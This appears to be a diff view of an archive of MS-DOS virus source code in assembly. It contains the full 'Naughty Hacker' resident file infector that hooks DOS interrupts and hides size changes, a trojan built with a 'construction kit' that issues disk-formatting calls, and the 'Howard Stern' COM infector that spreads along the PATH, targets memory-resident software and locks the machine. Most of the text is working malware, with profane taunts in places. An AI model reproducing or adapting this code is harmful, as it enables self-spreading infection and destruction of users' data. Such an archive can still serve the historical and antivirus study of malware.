cmp es:[di+0f],'OC'
jne Not_COMMAND
cmp es:[di+11],'MM'
jne Not_COMMAND
cmp es:[di+13],'NA'
jne Not_COMMAND ;check for command.com
cmp es:[di+15],' D'
jne Not_COMMAND
cmp es:[di+17],'OC'
jne Not_COMMAND
cmp byte ptr es:[di+19],'M'
Not_COMMAND:
ret
endcode label word
current_21h dd ?
null dd ? ;I forgot to remove this variable...
current_13h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
Floppy_org_13h dd ?
flag db ? ;0ff if error occures
veri db ?
handle dw ?
fname db 8+3 dup (?)
function db ?
my_flag db ?
limit dw ?
mem_ dw ?
next_flag db ?
buffer label word


866
MSDOS/Virus.MSDOS.Unknown.horse5.asm Normal file
View File

@ -0,0 +1,866 @@
.radix 16
;WARNING: THIS IS NOT A BASIC RELEASE BUT A WORK COPY!
;It seems that somebody had steal this version and
;circulates it now.
title The Naughty Hacker's virus version 3.0
comment / Naughty Hacker wishes you the best ! /
jmp start
virlen equ offset endcode-offset begin
alllen equ offset buffer-offset begin
begin label word
IP_save dw 20cdh
CS_save dw ?
SS_save dw ?
far_push dw ?
ident db 'C'
start:
call inf
inf:
pop bp
sub bp,offset start-offset begin+3
push es
push ds
mov es,es:[2]
mov di,start-begin
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-inf
cld
rep cmpsb
pop ds
push ds
pop es
je run
ina:
cmp word ptr [0],20cdh
je urud
jmp run
urud:
mov word ptr cs:[bp+handle-begin],0ffff
mov word ptr cs:[bp+counter-begin],2345
mov ax,ds
dec ax
mov ds,ax
sub word ptr [3],80
mov ax,es:[2]
sub ax,80
mov es:[2],ax
push ax
sub di,di
mov si,bp
mov ds,di
pop es
push cs
pop ds
mov cx,alllen
rep movsb
push cs
mov ax,offset run-begin
add ax,bp
push ax
push es
mov ax,offset inss-100-3
push ax
retf
run:
pop ds
pop es
cmp byte ptr cs:[bp+ident-begin],'C'
je comfile
mov dx,cs:[bp+CS_save-begin]
mov cx,cs
sub cx,word ptr cs:[bp+far_push-begin]
add dx,cx
add cx,cs:[bp+SS_save-begin]
cli
mov ss,cx
sti
clear:
push dx
push word ptr cs:[bp+IP_save-begin]
call clearr
retf
comfile:
mov ax,cs:[bp+IP_save-begin]
mov [100],ax
mov ax,cs:[bp+CS_save-begin]
mov [102],ax
mov ax,100
push ax
call clearr
retn
cur:
call exec
push bx
push es
push si
push ax
mov si,dx
cmp byte ptr [si],0ff
jne puf
mov ah,2f
call exec
mov al,byte ptr es:[bx+22d+7+1]
and al,31d
cmp al,31d
jnz puf
cmp word ptr es:[bx+28d+2+7+1],0
jne scs
cmp word ptr es:[bx+28d+7+1],virlen*2
jb puf
scs:
sub word ptr es:[bx+28d+7+1],virlen
sbb word ptr es:[bx+28d+2+7+1],0
puf:
pop ax
pop si
pop es
pop bx
iret
inff:
dec word ptr cs:[counter-begin]
jnz neass
call shop
neass:
cmp ah,11
je cur
cmp ah,12
je cur
cmp ah,4e
jne cur1.1
jmp cur1
cur1.1:
cmp ah,4f
jne cur1.2
jmp cur1
cur1.2:
cmp ah,3ch
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-begin],ah
cmp ah,3dh
je open
cmp ah,3e
je close_
cmp ax,4b00
je execute
cmp ah,17
je ren_FCB
cmp ah,56
je execute
cmp ah,43
je execute
here:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[current_21h-begin]
ren_FCB:
call transfer
call coont
jmp here
create:
call exec
mov word ptr cs:[handle-begin],ax
db 0ca,2,0
close_:
cmp word ptr cs:[handle-begin],0ffff
je here
cmp bx,word ptr cs:[handle-begin]
jne here
mov ah,45
call coont
mov word ptr cs:[handle-begin],0ffff
jmp here
execute:
mov ah,3dh
call coont
jmp here
open:
call coont
jmp here
cur1:
call exec
pushf
push ax
push bx
push es
mov ah,2f
call exec
mov al,es:[bx+22d]
and al,31d
cmp al,31d
jne puf1
cmp es:[bx+28d],0
jne scs1
cmp es:[bx+26d],virlen*2
jb puf1
scs1:
sub es:[bx+26d],virlen
sbb es:[bx+28d],0
puf1:
pop es
pop bx
pop ax
popf
db 0ca,2,0 ;retf 2
coont:
call exec
jnc ner
ret
ner:
mov bp,ax
mov byte ptr cs:[flag-begin],0
mov ah,54
call exec
mov byte ptr cs:[veri-begin],al
cmp al,1
jne rty
mov ax,2e00
call exec
rty:
mov ax,3508
call exec
mov word ptr cs:[current_08h-begin],bx
mov word ptr cs:[current_08h-begin+2],es
push bx
push es
mov al,21
call exec
push bx
push es
mov al,24
call exec
push bx
push es
mov al,13
call exec
push bx
push es
mov ah,25
mov dx,int13h-begin
push cs
pop ds
call exec
mov al,21
lds dx,cs:[org_21h-begin]
call exec
mov al,24
push cs
pop ds
mov dx,int24h-begin
int 21
mov al,8
mov dx,int08h-begin
int 21
mov bx,bp
push bx
mov ax,1220
call exec2f
mov bl,es:[di]
mov ax,1216
call exec2f
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp dx,0
jne contss
cmp ax,virlen
jnb contss
jmp close
contss:
cmp byte ptr cs:[function-begin],3dh
jne hhh
push di
add di,0f
mov si,offset fname-begin
cld
mov cx,8+3
rep cmpsb
pop di
jne hhh
jmp close
hhh:
cmp es:[di+18],'MO'
jne a2
jmp com
a2:
cmp es:[di+18],'EX'
je a8
jmp close
a8:
cmp byte ptr es:[di+17],'E'
je a3
jmp close
a3:
call cont
cmp word ptr [si],'ZM'
je okk
cmp word ptr [si],'MZ'
je okk
jmp close
okk:
cmp word ptr [si+0c],0
jne uuu
jmp close
uuu:
mov cx,[si+16]
add cx,[si+8]
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di+2]
sub cx,dx
or cx,cx
jnz usm
mov cx,es:[di]
sub cx,ax
cmp cx,virlen-(start-begin)
jne usm
jmp close
usm:
mov byte ptr [ident-begin],'E'
mov ax,[si+0e]
mov [SS_save-begin],ax
mov ax,[si+14]
mov [IP_save-begin],ax
mov ax,[si+16]
mov [CS_save-begin],ax
mov ax,es:[di]
mov dx,es:[di+2]
add ax,virlen
adc dx,0
mov cx,200
div cx
mov [si+2],dx
or dx,dx
jz oj
inc ax
oj:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4 ; This could be so:
mov bp,ax ;
and bp,0fh ; mov cx,10
lpp: ; div cx
shr dx,1 ;
rcr ax,1 ;
loop lpp ;
mov dx,bp ;
sub ax,[si+8]
add dx,start-begin
adc ax,0
mov [si+14],dx
mov [si+16],ax
mov word ptr [far_push-begin],ax
add ax,200
mov [si+0eh],ax
write:
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
push es:[di-2]
push es:[di-4]
xchg cx,es:[di-0dh]
push cx
mov ah,40
mov dx,buffer-begin
mov cx,01bh
int 21
cmp byte ptr cs:[flag-begin],0ff
jne ghj
stc
jc exit
ghj:
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call com?
jne f2
sub es:[di+4],virlen
sbb es:[di+6],0
f2:
mov ah,40
sub dx,dx
mov cx,virlen
int 21
cmp byte ptr cs:[flag-begin],0ff
jne exit
stc
exit:
pop cx
mov es:[di-0dh],cx
pop cx
pop dx
or byte ptr es:[di-0bh],40
jc closed
call com?
jne f3
and cx,31d
or cx,2
jmp closed
f3:
or cx,31d
closed:
mov ax,5701
int 21
close:
mov ah,3e
int 21
or byte ptr es:[di-0ch],40
push es
pop ds
mov si,di
add si,0f
mov di,offset fname-begin
push cs
pop es
mov cx,8+3
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-begin],0ff
jne qw
mov ah,0dh
int 21
qw:
cmp byte ptr cs:[veri-begin],1
jne rtyyu
mov ax,2e01
call exec
rtyyu:
sub ax,ax
mov ds,ax
cli
pop [13*4+2]
pop [13*4]
pop [24*4+2]
pop [24*4]
pop [21*4+2]
pop [21*4]
pop [8*4+2]
pop [8*4]
sti
retn
com:
test byte ptr es:[di-0dh],4
jz esc4
jmp close
esc4:
call cont
cmp byte ptr [si],0e9
jne usm2
mov ax,es:[di]
sub ax,[si+1]
cmp ax,virlen-(start-begin-3)
jne usm2
jmp close
usm2:
push si
cmp byte ptr es:[di+17],'C'
jne esc
mov byte ptr [ident-begin],'C'
lodsw
mov cs:[IP_save-begin],ax
lodsw
mov cs:[CS_save-begin],ax
mov ax,es:[di]
cmp ax,65535d-virlen-1
pop si
jb esc
jmp close
esc:
add ax,start-begin-3
call com?
jne f1
sub ax,virlen
f1:
mov byte ptr [si],0e9
mov word ptr [si+1],ax
jmp write
inss:
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
mov ax,0ffff
call dword ptr [21h*4]
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap2-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
mov ax,0ffff
call dword ptr [2fh*4]
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap3-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
sub ax,ax
call dword ptr [13h*4]
sub ax,ax
mov ds,ax
les ax,[21*4]
mov word ptr cs:[current_21h-begin],ax
mov word ptr cs:[current_21h-begin+2],es
mov [21*4],offset inff-begin
mov [21*4+2],cs
retf
trap:
push bp
mov bp,sp
push bx
cmp [bp+4],300
ja exit2
mov bx,[bp+2]
mov word ptr cs:[org_21h-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_21h-begin+2],bx
and [bp+6],0feff
exit2:
pop bx
pop bp
iret
trap2:
push bp
mov bp,sp
push bx
cmp [bp+4],100
ja exit3
mov bx,[bp+2]
mov word ptr cs:[org_2fh-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_2fh-begin+2],bx
and [bp+6],0feff
exit3:
pop bx
pop bp
iret
trap3:
push bp
mov bp,sp
push bx
cmp [bp+4],0C800
jb exit4
mov bx,[bp+2]
mov word ptr cs:[org_13h-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_13h-begin+2],bx
and [bp+6],0feff
exit4:
pop bx
pop bp
iret
exec:
pushf
call dword ptr cs:[org_21h-begin]
ret
exec2f:
pushf
call dword ptr cs:[org_2fh-begin]
ret
int08h:
pushf
call dword ptr cs:[current_08h-begin]
push ax
push ds
sub ax,ax
mov ds,ax
cli
mov [13*4],offset int13h-begin
mov [13*4+2],cs
mov [8*4],offset int08h-begin
mov [8*4+2],cs
mov ax,word ptr cs:[org_21h-begin]
mov [21*4],ax
mov ax,word ptr cs:[org_21h-begin+2]
mov [21*4+2],ax
mov [24*4],offset int24h-begin
mov [24*4+2],cs
sti
pop ds
pop ax
iret
int24h:
mov al,3
iret
int13h:
pushf
call dword ptr cs:[org_13h-begin]
jnc dfg
mov byte ptr cs:[flag-begin],0ff
dfg:
clc
db 0ca,02,0 ;retf 2
cont:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,01bh
mov dx,offset buffer-begin
mov si,dx
int 21
cmp byte ptr cs:[flag-begin],0ff
jne a1
stc
pop ax
jmp close
a1:
ret
com?:
cmp es:[di+0f],'OC'
jne zz
cmp es:[di+11],'MM'
jne zz
cmp es:[di+13],'NA'
jne zz
cmp es:[di+15],' D'
jne zz
cmp es:[di+17],'OC'
jne zz
cmp byte ptr es:[di+19],'M'
zz:
ret
transfer:
cld
inc dx
mov si,dx
mov di,offset buffer-begin
push di
push cs
pop es
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
mov al,0
stosb
pop dx
push cs
pop ds
mov ax,3d00
ret
e1:
cli
push ax
push di
push es
mov ax,0b800
mov es,ax
mov ax,word ptr cs:[pos-begin]
push ax
call comp
mov ax,word ptr cs:[strg-begin]
stosw
pop ax
or ah,ah
jz s3
cmp ah,24d
jb s1
s3:
neg byte ptr cs:[y-begin]
s1:
or al,al
jz s4
cmp al,79d
jb s2
s4:
neg byte ptr cs:[x-begin]
s2:
mov ah,byte ptr cs:[y-begin]
mov al,byte ptr cs:[x-begin]
add byte ptr cs:[pos+1-begin],ah
add byte ptr cs:[pos-begin],al
mov ax,word ptr cs:[pos-begin]
call comp
mov ax,es:[di]
mov word ptr cs:[strg-begin],ax
mov es:[di],0f07
pop es
pop di
pop ax
sti
iret
comp:
push ax
push bx
sub bh,bh
mov bl,al
mov al,160d
mul ah
add ax,bx
add ax,bx
mov di,ax
pop bx
pop ax
ret
shop:
push ax
push ds
mov byte ptr cs:[x-begin],0ff
mov byte ptr cs:[y-begin],0ff
mov word ptr cs:[pos-begin],1013
mov ax,0003
int 10
sub ax,ax
mov ds,ax
cli
mov [1c*4],offset e1-begin
mov [1c*4+2],cs
sti
pop ds
pop ax
ret
clearr:
sub ax,ax
sub bx,bx
sub cx,cx
sub dx,dx
sub si,si
sub di,di
sub bp,bp
ret
db 666d ;Foolish ?!! -> dw 666d
db 55,0AA
endcode label word
current_21h dd ?
current_08h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
flag db ?
veri db ?
handle dw 0ffff
fname db 8+3 dup (?)
function db ?
pos dw ?
x db ?
y db ?
strg dw ?
counter dw ?
buffer label word

1366
MSDOS/Virus.MSDOS.Unknown.horse8.asm Normal file
View File

File diff suppressed because it is too large Load Diff

20
MSDOS/Virus.MSDOS.Unknown.host.asm Normal file
View File

@ -0,0 +1,20 @@
.model tiny
.code
;******************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
public HOST
db 100 dup (0)
HOST:
mov ax,4C00H ;Terminate, error code = 0
int 21H
HOST_END:
END


88
MSDOS/Virus.MSDOS.Unknown.house.asm Normal file
View File

@ -0,0 +1,88 @@
; Trojan Horse Constructed with...
; The Trojan Horse Construction Kit, v1.00
; Copyright(c) 1992, Stingray/VIPER
; A Viral Inclined Programming Experts Ring Programming Team Production.
IDEAL
DOSSEG
MODEL small
STACK 256
DATASEG
msg_1 db "",13,10
db "This is a Trojain horse. Curtocy of White Shark! HA HA HA",13,10
db "",13,10
db "Mess with White Shark and you'll be eaten alive!",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db '$'
msg_2 db "",13,10
db "You've been fucked! Curtocy of White Shark!",13,10
db "",13,10
db "Mess with White Shark and you'll be eaten alive!",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db '$'
vip db "±ÅÆÐ}ÑÏÌǾË}Ô¾Ð}ÀϾÑÂÁ}ÔÆÑÅ‹‹‹",106,103
db "±ÅÂ}±ÏÌǾË}¥ÌÏÐÂ} ÌËÐÑÏÒÀÑÆÌË}¨Æщ}ÓŽ<C5BD><E280B9>",106,103
db " ÌÍÖÏÆÄÅÑ}…À†}Ž<E28093>‰}³ÆϾÉ}¦ËÀÉÆËÂÁ}­ÏÌÄϾÊÊÆËÄ}¢ÕÍÂÏÑÐ}¯ÆËÄ‹",106,103
CODESEG
Start:
mov ax,@data
mov ds,ax
mov ah,9
mov dx,offset msg_1
int 21h
mov dl,24
aqui:
call fry
call fry
call fry
inc dl
cmp dl,1
jne aqui
mov ah,9
mov dx,offset msg_2
int 21h
mov si,offset vip
call DeCrypt_Print
jmp Exit
PROC DeCrypt_Print
push ax
push dx
here:
lodsb
or al,al
je no_mas
xchg dl,al
sub dl,93
mov ah,2
int 21h
jmp short here
no_mas:
pop ax
pop dx
ret
ENDP DeCrypt_Print
PROC fry
push dx
mov ax,ds
mov es,ax
mov ax,0701h
mov ch,0
int 13h
pop dx
ret
ENDP fry
Exit:
mov ax,4c00h
int 21h
END Start

472
MSDOS/Virus.MSDOS.Unknown.howard.asm Normal file
View File

@ -0,0 +1,472 @@
; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ
; uK E-ÿÿÿÿÿÿ
; E- 'HOWARD STERN ViRUS ASM SOURCE' Nuÿÿÿÿÿÿ
; Nu KEÿÿÿÿÿÿ
; KE ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Nÿÿÿÿÿÿ
; -N by uKÿÿÿÿÿÿ
; uK DEATHBOY [NuKE] E-ÿÿÿÿÿÿ
; E- Nuÿÿÿÿÿÿ
; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ
;ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
; [HOWARD].ASM -- The Howard Stern virus
;
; Written by DeathBoy[NuKE]
;
; Well, this ought to turn some heads... NOT... this is the source code for
; a New Virus... It displays ' I'm Not working until Howard Stern is Done
; @ 11:00 am. Bow down Before the King.' if the infected program is ran
; anytime before 11:00 am.===> Then lock up the Computer!
; It is a Non-Resident .COM infector that is 967 bytes long
; compiled...TO make this a Working DEMO...you will need TASM v2.0
; or better... ( TASM /mx /m2 /q HOWARD.asm ) then
; ( TLINK /x /t HOWARD.obj )
; the result should be a 1003 byte *.COM file infector that follows
; the DOS PATH= looking for victim files...
; it will only infect 2 files per execution
; of an infected file...
;
; CHEERS TO YOU HOWARD & Robin, I'm a Big FAN... Please
; COME TO ATLANTA, GA...
; Infinity ( 92.9 FM ) has the GreaseIdiot on & I'm
; going Crazy!
;
; Ps. I thought the Book was funny, #2 on the Best-seller's list in the
; area Stores ( & YOU ARE NOT ON DOWN HERE !!! ) ... Keep it up...
;
;=====> The intent of this VIRUS is not to destroy but to Annoy, !
;Please do not give anyone this virus unless they want it, Knowingly ...
; You are responsible for your actions...
;
; BTW, there is a slight Bug in the Virus, put there on purpose
; It is an easy one to find & FIX... IF you can fix it,
; then :) You do not need to register.
;
; If not... then you do not need to know how.
; OR
; If you register however, I will take out the 'Beg/Buggy-Code'
;
; Get you AV idiots... FYA ESAD YMABFFW
;
; Long Live [NuKE], ARiSToTLE, NT, BO, & the latest [NuKE]
; member .. NoSFaRTu(sp) :)
;
;----------------------------CUT HERE-----------------------------------
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
push di ; Stupid Shit For Stupid
push bp ; Programs
push dx ;
mov ax,05FEh ; Trash some mem. res.
mov dx,0A6BAh ; software...
not ax ;
not dx ;
int 16h ; golly wally, did that work?
mov ax,05FDh ;
mov dx,0A6BAh ; Maybe this time ???
mov bx,0000h ;
not ax ;
not dx ;
int 16h ;
pop dx ;
pop bp ;
pop di ; Ok. lets do this.
db 0E9h,00h,00h ; Standard BS pointer
start: call get_loc ; Like an Old trick
get_loc: pop bp ; BP holds old IP
sub bp,offset get_loc; Adjust for length of host
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
xchg ax,bx ; beat the heat
xchg bx,ax ; with clean code
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
push sp ; doing the nasty with the
pushf ; stupid coding.
push bp ; Are you sure you know
push di ; what you are doing??
push dx ; Doesn't look it??
call disvsafe ; Ahh, FiDO-DoRKS LOOK HERE
pop dx ; Snoop-doogy dawg...
pop di ; Yippie-Oh Yippie-heh.
pop bp ;
popf ; Freedom to do as I please.
pop sp ;
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
xchg ax,bx ; Do Stuff for fun.
xchg ax,bx ; Reiterate that
int 021h ; R U still reading this??
; WHy??? :^)
call search_me ; Find and infect a file
call search_me ; 2 files
call get_hour
cmp ax,000Bh ; Did the function return 11?
jle go_next ; If less than or equal, do effec
jmp not_yet ; Otherwise skip over it
go_next: cmp ax,0006h ; Before 6:00am ??
jge strt00 ; Yep, Go do it
jmp not_yet ; Nop, let get outta here
strt00:
push sp ; More BS... for the
pushf ; Bytes...
push bp ;
push di ; It looks good in hex :)
push dx ; Not! Show me some fucked
; code please!!!
mov ah,09h ; BIOS display char. function
mov dx, offset data01 ; whoop there it is...
int 21h
pop dx ; This is just for kicks
pop di ; & giggles...
pop bp ; Something tells
popf ; me to do this...
pop sp ; just for laughs
lea si,[di + data00] ; SI points to shit
call show_this
mov cx,45h ; number of flashes
flash:
xor ax,ax ; Clear Register
mov al,0FFh ; Load binary flags
mov dx,060h ; Port number
out 060h,al ; Toggle Keyboard lights
dec cx ; lets do it one less time
nop ; good for what ails you.
jcxz getout ; ok, I'm thru.
nop
loop flash ; nah, I want to do it again
getout: cli ; Clear the interrupt flag
hlt ; HALT the computer
jmp $ ; Why not??
not_yet: xor ax,ax ; Clear Register
mov al,0FFh ; Load binary flags
mov dx,060h ; Port number
out 060h,al ; Toggle Keyboard lights
dec cx ; lets do it one less time
nop ; good for what ails you.
jcxz com_end ; ok, I'm thru.
loop not_yet ; nah, I want to do it again
com_end: pop dx ; DX holds DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; DUMP out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
disvsafe proc near ; Well, Now this
mov ax,05FEh ; is abusive.
mov dx,0A6BAh ;
not ax ;
not dx ;
int 16h ; Pretty Stupid, Huh?
mov ax,05FDh ; Ha... You're looking
mov dx,0A6BAh ; at it aren't you??
mov bx,0000h ;
not ax ;
not dx ; Yep, Lamest...
int 16h ;
ret ;
disvsafe endp
search_me proc near
mov bx,di ; BX points to the virus
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,01h ; Clean code, Clean code...
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call scan_path ; Start scanning
scanpath_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsucces
je found_none ; If so then we're done
call found_sub ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
xor ah,ah ; Clear register
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
lea dx,[bx + com_mask] ; DX points to '*.COM'
push di
mov di,bx
call find_me ; Try to infect a .COM file
mov bx,di
pop di
jnc found_none ; If successful the exit
jmp short scanpath_loop ; Keep checking the PATH
found_none: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of direc
jne try_again ; If not then exit
stc ; Set the carry flag for failure
try_again: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db '*.COM',0 ; Mask for all .COM files
search_me endp
scan_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment s
xor di,di ; DI holds the starting offset
find_path: lea si,[bx + path_string] ; SI points to 'PATH='
lodsb ; Load the 'P' into AL
xor cl, cl ; Clean those registers
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of 'PATH='
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking
mov word ptr [bx + path_ad],di ; Save the PATH add
mov word ptr [bx + path_ad + 2],es ; Save the PATH's s
ret ; Return to caller
path_string db 'PATH=' ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
scan_path endp
found_sub proc near
lds si,dword ptr [bx + path_ad] ; DS:SI points to P
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_sub: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_sub ; Keep transfering characters
; keep it up
moved_last_one: mov si,0000h ; Zero SI to signal complet
moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the pa
ret ; Return to caller
found_sub endp
find_me proc near
push bp ; Save BP
mov ah,0FFh ; Clean code
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,0FFh ; Clean code
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
xchg ax,bx ; Lets do the Time
xchg ax,bx ; warp again
int 021h
mov ah,0FFh ; Clean code just for fun
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc found_out ; Exit if no files found
call infect_file ; Infect the file!
jnc found_out ; Exit if no error
mov ah,0FFh ; Clean code
mov ah,04Fh ; DOS find next file function
jmp short find_a_file; Try finding another file
found_out: mov sp,bp ; Restore old stack frame
mov ah,0FFh ; Clean code
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_me endp ; Are you reading this
; nonsense?
show_this proc near
mov ah,0Eh ; BIOS display
loop_this: lodsb ; Load next char. into AL
or al,al ; Is the character a null?
je show_ended ; Yep, exit
int 010h ; BIOS video interrupt
jmp short loop_this ; Do next character
show_ended:
ret ; Return to caller
show_this endp
data00 db ' I'm not working until Howard Stern is done @ 11:00 am
db ' Bow down before the King ',13,12
db ' Smile ... [NuKE] loves you',13,10,13,10,07,13,0
data01 db ' I'm not working until Howard Stern is done @ 11:00 am
infect_file proc near
mov ah,0FFh ; Clean code, yeaah suuure
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe we_be_good ; If it's small enough continue
jmp infection_done ; Otherwise exit
we_be_good: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ah,0FFh ; Clean code
xor ah,ah ; Clean the registers
mov ah,0FFh ; Clean code again
xor ah,ah ; Clean the registers
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jum
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file
add ax,finish - start ; Re-adjust to make the jum
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,0BCFEh ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
not ax
int 021h
mov ax,0C2FDh ; DOS open file function, r/w
not ax
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
xor ah,ah ; Clear Registers
xor ax,ax
mov ax,0BDFDh ; DOS file seek function, EOF
not ax
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
mov ah,69h
mov ah,040h ; DOS write to file function
mov cx,finish - start; CX holds virus length
lea dx,[di + start] ; DX points to start of virus
int 021h
mov ah,69h
xor ax,ax
mov ax,0A8FEh ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
not ax
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,0BCFEh ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
not ax
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if fa
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp
note db ' 1234567890!@#$%^&*()ascii '
db ' (c) Ba Ba Stupid... '
db ' Remember Studderin' John '
db ' Robin, I love You! '
db ' Long Live [NuKE] '
db 12h,13h,17h,19h
db ' Georgia needs Howard Stern'
finish label near
code ends
end main

412
MSDOS/Virus.MSDOS.Unknown.hr.asm Normal file
View File

@ -0,0 +1,412 @@
;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
